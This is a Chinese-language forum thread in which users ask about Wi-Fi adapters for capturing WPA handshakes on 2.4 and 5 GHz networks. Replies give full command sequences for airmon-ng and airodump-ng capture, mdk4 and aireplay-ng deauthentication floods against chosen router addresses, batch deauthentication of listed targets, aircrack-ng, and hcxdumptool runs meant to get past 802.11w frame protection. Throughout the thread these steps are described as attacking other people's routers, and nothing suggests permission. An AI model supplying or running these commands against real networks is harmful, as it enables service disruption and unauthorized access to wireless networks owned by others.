抓5g握手包大家都用什么网卡？

qxhdly

哪个牌子比较正规

过客来了

新手一枚 回帖赚积分

航天梦

马上成功 发表于 2023-12-29 14:18
大佬哪里搞的？20元就能搞到。俺花了三十多搞了5572 ，又花了四十多搞了个8812，又花了五十多搞了个7612 ...

据我多年玩的3070网卡推荐给你，这卡我现在还在用

马上成功

航天梦 发表于 2024-1-1 15:26
据我多年玩的3070网卡推荐给你，这卡我现在还在用

求大佬说详细点啊，俺去看了下有很多3070的网卡，什么台湾阿尔法的，什么6661功放、6669功放、6649功放等等，不知道到底哪种好啊？

马上成功

xun73tian 发表于 2023-12-28 18:43
8812AU网卡kali系统，airodump-ng抓包，mdk4干扰。

大佬，kali种如何调用mdk4干扰啊，俺用奶瓶抓包那个干扰都还是mdk3，对现在很多路由没作用了。

xun73tian

马上成功 发表于 2024-1-7 11:25
大佬，kali种如何调用mdk4干扰啊，俺用奶瓶抓包那个干扰都还是mdk3，对现在很多路由没作用了。 ...

使用8812AU网卡抓包：适应于2.4G和5.0G （最有效方法）
终端一：选择攻击的路由
systemctl stop NetworkManager
airmon-ng check kill
iwconfig  （查看无线网卡信息）
airmon-ng start wlan0 （开启无线网卡监听模式）
airodump-ng wlan0 --band a  （扫描5.0G的路由）
或者
airodump-ng wlan0 --band bg  （扫描2.4G的路由）

airodump-ng -w 包命名 -c 信道 --bssid 路由地址 wlan0
//抓取握手包，被动抓包（适应于2.4G和5.0G）

终端二：mdk4攻击
mdk4 wlan0 d -s 30 -B 路由地址  （攻击具体路由）
-s 30：攻击30秒
补充：aireplay攻击方法
aireplay-ng -0 50 -a 路由地址 -D wlan0

查看捕获的握手包：
aircrack-ng /root/CYJ.cap

mdk4批量攻击：
把要攻击的目标MAC写入到/root/1.txt文本中。
echo 6C:B1:58:E8:0C:60 >1.txt   （覆盖输入）
echo 6C:B1:58:E8:0C:61 >>1.txt  （追加输入）
mdk4 wlan0 d -b ./1.txt  （可同时攻击2.4和5G）

马上成功

xun73tian 发表于 2024-1-7 11:44
使用8812AU网卡抓包：适应于2.4G和5.0G （最有效方法）
终端一：选择攻击的路由
systemctl stop NetworkMa ...

大佬，俺不知道这攻击是不是在正常执行了，可是还是抓不到包啊。mdk4攻击和aireplay攻击都试过了，你看下截图，是不是在攻击的？


aireplay攻击




mdk4攻击




另外在请教个问题，这两种攻击是攻击路由器吗，和aireplay-ng踢掉连接的客户端那个是不是一回事啊？  如果不是一回事那是不是这样理解：mdk4是攻击路由器，而aireplay-ng是攻击客户端？

xun73tian

马上成功 发表于 2024-1-7 22:01
大佬，俺不知道这攻击是不是在正常执行了，可是还是抓不到包啊。mdk4攻击和aireplay攻击都试过了，你看下 ...

都是攻击路由器，airodump-ng抓包建议使用mdk4.也有可能你抓的是双频路由器的包，对方客户端会在2.4G和5G之间跳动。
请认真看我下面的演示：

1、扫描2.4G和5G的网络




2、抓2.4G的包





3、mkd4批量攻击2.4G和5G



4、抓到了握手包

上上网

马上成功 发表于 2024-1-7 22:01
大佬，俺不知道这攻击是不是在正常执行了，可是还是抓不到包啊。mdk4攻击和aireplay攻击都试过了，你看下 ...

大佬，kali种如何调用mdk4干扰啊，俺用奶瓶抓包那个干扰都还是mdk3，对现在很多路由没作用了。
大佬，俺不知道这攻击是不是在正常执行了，可是还是抓不到包啊。mdk4攻击和aireplay攻击都试过了，你看下截图，是不是在攻击的？

如果是这种情况, 那很可能是路由器有帧保护机制
传统的解除身份验证/DISASSOCIATION攻击失效。(包括mdk4)
看......
这就是为什么你们抓不了包原因
https://www.anywlan.com/forum.php?mod=viewthread&tid=451270&fromuid=1093833

一些被动式工具已经被这些AP免疫了, 此时你应该转为使用主动式抓包工具应该就可以抓到它了
例如...      hcxdumptool 的一些攻击在运行 MFP （802.11w） 的网络上起作用。
https://github.com/ZerBea/hcxdumptool


在启用MFP的路由器上进行快速测试：
time hcxdumptool -i wlp5s0f3u2 --rds=1 -c 11a --exitoneapol=7                 11为该信道
or
hcxdumptool -i wlan0 -o test.pcapng --active_beacon --enable_status=15
使用语法可参考hcxdumptool --help

PS: 如果抓到了上传一下这个包文件

马上成功

xun73tian 发表于 2024-1-8 00:28
都是攻击路由器，airodump-ng抓包建议使用mdk4.也有可能你抓的是双频路由器的包，对方客户端会在2.4G和5G ...

大佬，俺还是没抓到，俺突然想到问题，是不是这个原因？ 就是抓包和攻击要用两张网卡，抓包一张攻击一张，俺一直都是用的一直5572的卡在抓包时打开第二个终端进行MDK4攻击的，是不是这样原因导致抓不到？会不会是因为一张网卡又要抓包又要攻击忙不过来啊

xun73tian

马上成功 发表于 2024-1-9 22:13
大佬，俺还是没抓到，俺突然想到问题，是不是这个原因？ 就是抓包和攻击要用两张网卡，抓包一张攻击一张 ...

有没有客户端连接？路由器与客户端之间有没有数据在跑动？
我在kali中airodump-ng抓包时，一直使用8812AU网卡。要不使用airgeddon抓包试试？

马上成功

xun73tian 发表于 2024-1-9 23:00
有没有客户端连接？路由器与客户端之间有没有数据在跑动？
我在kali中airodump-ng抓包时，一直使用8812AU ...

客户端是有的，这肯定。 如果不是只有一张网卡的问题那可能那个路由是防抓包的或者距离远了信号弱吧。只有继续试试。 另外我感觉8812的卡用来破解不是太行，把这个卡加载进KALI系统用wifite攻击后，就收不到信号了，需要重新退出再加载进去才恢复，当然也可能是我这张卡自身的原因吧。而且8812奶瓶和水滴都不支持了，我在wifislax里试过。   5572也是支持双频的，奶瓶水滴都支持。       另外再请教个问题啊，就是wifislax西班牙系统除了虚拟机安装vmwaretools、加载移动U盘的方法之外还有没有其它方法把抓的包导到电脑上？比如像以前的CD系统那样用FTP服务器，可西班牙洋文的也看不懂，不知道带没带FTP，主要是洋文的看不懂不会用，平时就用这个打开奶瓶和水滴用用，主要是这个系统是窗口界面的好操作些，kali全要命令不是太习惯用。   用移动U盘虽然可以导出来，但也相对有点麻烦吧。   我这边虚拟机里的wifislax安装不了vmwaretools，折腾了几次都不行，上次也向你请教过这个问题，我去找了相关教程资料都不行，也不知道是我电脑的原因还是虚拟机的原因。